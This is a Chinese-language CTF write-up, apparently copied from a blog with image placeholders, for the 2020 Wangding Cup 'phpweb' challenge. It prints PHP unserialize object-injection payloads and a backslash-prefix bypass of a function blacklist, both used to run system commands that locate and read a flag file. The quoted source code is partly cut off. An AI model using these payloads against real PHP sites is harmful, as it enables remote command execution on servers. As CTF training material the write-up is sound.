[网鼎杯 2020 朱雀组]phpweb

先发现他的页面一直刷新,时间也一直刷新,有点眼熟

先抓包看看,发现post参数,可能是前面传的是函数,后面是函数的参数

[网鼎杯 2020 朱雀组]phpweb_第1张图片

试试其他函数比如MD5()确实执行了

[网鼎杯 2020 朱雀组]phpweb_第2张图片

但是在尝试system的时候发现hacking,说明被过滤了,试了passthru()同样也是

[网鼎杯 2020 朱雀组]phpweb_第3张图片

这里我们需要查看页面源代码,进行代码审计 在这里我们可以使用多种函数进行查看 例如:file_get_contents、highlight_file() ,show_source()等

file_get_contents(index.php):读取文件的内容

其他师傅通过func=file_get_contents&p=index.php得到源码 可我却没有,我也不清楚了

[网鼎杯 2020 朱雀组]phpweb_第4张图片

 func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
​
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

代码审计,本关的黑名单还是挺全面的。

方法一:

但咱们可以使用 反序列化 (出题人的本意也应该是这样)

构造payload:

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

并没有发现有用的

[网鼎杯 2020 朱雀组]phpweb_第5张图片

查看根目录也是没有

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

[网鼎杯 2020 朱雀组]phpweb_第6张图片

发现还是没有 falg的信息

system(“find / -name flag”):查找所有文件名匹配flag的文件

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

[网鼎杯 2020 朱雀组]phpweb_第7张图片

 
  
func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

[网鼎杯 2020 朱雀组]phpweb_第8张图片

方法二:

我们要对黑名单进行一个绕过 所以在本关我们可以使用别的方法来达到获取flag的目的 php内的" \ "在做代码执行的时候,会识别特殊字符串,绕过黑名单

func=\system&p=find / -name flag*

[网鼎杯 2020 朱雀组]phpweb_第9张图片

func=\system&p=cat /tmp/flagoefiu4r93

[网鼎杯 2020 朱雀组]phpweb_第10张图片

你可能感兴趣的:(android)